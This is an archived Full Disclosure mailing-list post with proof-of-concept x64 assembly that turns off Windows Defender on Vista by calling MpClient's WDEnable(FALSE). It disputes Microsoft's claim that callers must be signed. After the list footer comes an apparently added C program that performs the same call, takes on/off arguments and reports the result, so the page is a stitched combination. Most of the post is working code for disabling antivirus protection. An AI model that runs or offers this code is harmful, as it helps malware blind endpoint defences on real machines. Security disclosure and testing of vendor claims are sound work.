Full Disclosure mailing list archives
[Wired Security/EOF] Disable Windows Defender (Vista) PoC code
From: <skyout.fd () wired-security net>
Date: Wed, 14 May 2008 18:05:17 +0200
Hey guys, my friend Izee from the EOF-Project(.net) team has coded a simple PoC that demonstrates how to disable Windows Defender on Vista (tested with and without SPs on x86/x64) using its own API made for it. The API has the following structure:

--- SNIP ---

HRESULT WDEnable(
    BOOL fEnable
);

---

Something about the parameter(s):

--- SNIP ---

Parameters

fEnable [in]
    Windows Defender status that the calling application wants to set. TRUE enables Windows Defender. FALSE disables Windows Defender.

---

Now the interesting thing, what Microsoft says about the security of this API:

--- SNIP ---

Remarks

The application calling this function must run with administrator permissions on the local computer. In Windows Vista, the user is prompted for administrator permission when the application is running with lower privileges.

Windows Defender also validates proper signing of the calling process (and all the loaded modules) before allowing the calling application to change the status. If the calling process image (or any loaded modules) is not signed or is flagged as a threat by the Windows Defender signature, then the call fails with the appropriate error code.

---

And here is the code from Izee/EOF that shows that this is a lie and nothing more. The users get fooled...

--- SNIP ---

; x64 MASM. Build: ml64 eof.asm /link /subsystem:console /entry:eof
includelib kernel32.lib         ; the three imports below live in kernel32

extrn LoadLibraryA   :proc
extrn GetProcAddress :proc
extrn ExitProcess    :proc

.data
l db '\Program Files\Windows Defender\MpClient',0   ; MpClient.dll, path relative to the current drive's root
p db 'WDEnable',0

.code
eof proc
    push rsp                    ; rsp is 8 mod 16 at entry; one push re-aligns it to 16
    sub  rsp, 20h               ; 32-byte shadow space required by the x64 calling convention
    lea  rcx, l
    call LoadLibraryA           ; rax = HMODULE of MpClient.dll
    lea  rdx, p
    mov  rcx, rax
    call GetProcAddress         ; rax = address of WDEnable
    xor  rcx, rcx               ; fEnable = FALSE: turn Windows Defender off
    call rax                    ; WDEnable(FALSE); HRESULT comes back in eax
    mov  ecx, eax               ; hand the HRESULT to ExitProcess as the exit code (the original discarded it)
    call ExitProcess
eof endp
end

---

News: http://wired-security.net/archive/2008/may/index.php#07_2_052008

Sincerely,
SkyOut/Wired Security in cooperation with Izee/EOF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
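The assembly PoC throws away the HRESULT that WDEnable returns, so a run of it does not by itself show whether MpClient accepted the call from an unsigned binary or refused it with the error code Microsoft's remarks promise. The following is an added example (my code, not Izee's or Microsoft's) that performs the same LoadLibrary/GetProcAddress/WDEnable sequence in C and reports the result. Assumptions: MpClient.dll sits at the PoC's path anchored on drive C:, the exported signature is the one quoted above, and the only failure code given a name is the generic Win32 E_ACCESSDENIED (0x80070005); the page does not say which HRESULT Defender returns for a signing failure, so every other failure is reported only as a rejection.

```c
/* wd_toggle.c: added example, not the EOF PoC. Build on Windows with
 *   cl /W4 wd_toggle.c
 * and run elevated:  wd_toggle off   |   wd_toggle on
 * Same dynamic-load sequence as the assembly, but the HRESULT is kept and
 * printed, so the run tells you whether MpClient accepted the call. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Map "on"/"off" to the fEnable value: 1, 0, or -1 for anything else. */
int parse_flag(const char *arg)
{
    if (strcmp(arg, "on") == 0)  return 1;
    if (strcmp(arg, "off") == 0) return 0;
    return -1;
}

/* Classify a WDEnable HRESULT. Kept portable so it can be checked without
 * MpClient.dll: bit 31 set means failure (the FAILED() macro). 0x80070005 is
 * the generic Win32 E_ACCESSDENIED; the code Defender uses for a signing
 * failure is not stated on the page, so anything else is just "rejected". */
const char *wd_describe(int32_t hr)
{
    uint32_t u = (uint32_t)hr;
    if ((u & 0x80000000u) == 0)
        return "accepted";                     /* SUCCEEDED(hr) */
    if (u == 0x80070005u)
        return "rejected: E_ACCESSDENIED";     /* typically: not elevated */
    return "rejected";
}

#ifdef _WIN32
#include <windows.h>

typedef HRESULT (WINAPI *WDEnable_fn)(BOOL fEnable);

/* Assumed location: the PoC's own path, anchored on drive C:. */
static const char *MPCLIENT_PATH = "C:\\Program Files\\Windows Defender\\MpClient.dll";

/* Load MpClient.dll, resolve WDEnable and call it. Returns WDEnable's
 * HRESULT, or E_FAIL with a message in err if the DLL or export is missing. */
HRESULT wd_enable(BOOL fEnable, char *err, size_t errlen)
{
    HMODULE h = LoadLibraryA(MPCLIENT_PATH);
    if (h == NULL) {
        snprintf(err, errlen, "LoadLibraryA failed (Win32 error %lu)", GetLastError());
        return E_FAIL;
    }
    WDEnable_fn fn = (WDEnable_fn)GetProcAddress(h, "WDEnable");
    if (fn == NULL) {
        snprintf(err, errlen, "WDEnable not exported (Win32 error %lu)", GetLastError());
        FreeLibrary(h);
        return E_FAIL;
    }
    /* Per the quoted remarks, an unelevated caller is prompted for admin rights here. */
    HRESULT hr = fn(fEnable);
    FreeLibrary(h);
    return hr;
}

int main(int argc, char **argv)
{
    int flag = parse_flag(argc > 1 ? argv[1] : "");
    if (flag < 0) {
        fprintf(stderr, "usage: %s on|off\n", argv[0]);
        return 2;
    }
    char err[160] = "";
    HRESULT hr = wd_enable((BOOL)flag, err, sizeof err);
    printf("WDEnable(%s) -> 0x%08lX: %s %s\n",
           flag ? "TRUE" : "FALSE",
           (unsigned long)(uint32_t)hr, wd_describe((int32_t)hr), err);
    return FAILED(hr) ? 1 : 0;
}
#endif
```

To test the signing claim, run the unsigned build elevated with `off`, read the printed HRESULT, and then confirm Defender's state independently (its own UI or service status) rather than trusting the exit status alone; a non-zero HRESULT with Defender still running is the outcome the remarks describe, a zero HRESULT with Defender off is the outcome the PoC claims.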
Current thread:
- [Wired Security/EOF] Disable Windows Defender (Vista) PoC code skyout.fd (May 14)
- Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Peter Ferrie (May 14)
- Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Fredrick Diggle (May 14)
- Re: [Wired Security/EOF] Disable Windows Defender(Vista) PoC code skyout.fd (May 15)
- Re: [Wired Security/EOF] Disable Windows Defender(Vista) PoC code Fredrick Diggle (May 16)
- Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Peter Ferrie (May 14)